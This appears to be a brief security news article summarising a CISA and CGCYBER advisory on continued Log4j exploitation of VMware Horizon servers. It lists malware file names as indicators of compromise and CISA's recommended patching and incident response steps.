In the middle of December, last year, Apache Log4j vulnerability emerged. The vulnerability affected the systems utilizing the Java logging library. The easiness of exploitation of the flaw and the possibilities of what you can do after exploiting it, which is Remote Code Execution, attracted many threat actors. Now, after almost 8 months, CISA had to make a warning regarding this vulnerability.
Patch vulnerable products immediately
CISA (Cybersecurity and Infrastructure Security Agency) and CGCYBER (the United States Coast Guard Cyber Command) have published an advisory. The advisory tells the system admins to update VMware Horizon and Unified Access Gateway servers that run vulnerable Log4j versions. The vulnerability, which can be tracked as CVE-2021-44228, has been patched by Apache shortly after the vulnerability was noticed by the public.
CISA and CGCYBER recommend all organizations with affected systems that did not immediately apply available patches or workarounds assume compromise and initiate threat hunting activities using the IOCs provided in this CSA, Malware Analysis Report (MAR)-10382580-1, and MAR-10382254-1. If potential compromise is detected, administrators should apply the incident response recommendations included in this CSA and report key findings to CISA.
In the advisory, CISA also gave the names of the loader malware they found: hmsvc.exe, SvcEdge.exe, odbcads.exe, praiser.exe, fontdrvhosts.exe, and winds.exe. In case of the discovery of exploitation, CISA recommends;
- Immediately isolating affected systems.
- Collecting and reviewing relevant logs, data, and artifacts.
- Considering soliciting support from a third-party incident response organization that can provide subject matter expertise, ensure the actor is eradicated from the network, and avoid residual issues that could enable follow-on exploitation.
- Reporting incidents to CISA via CISA’s 24/7 Operations Center.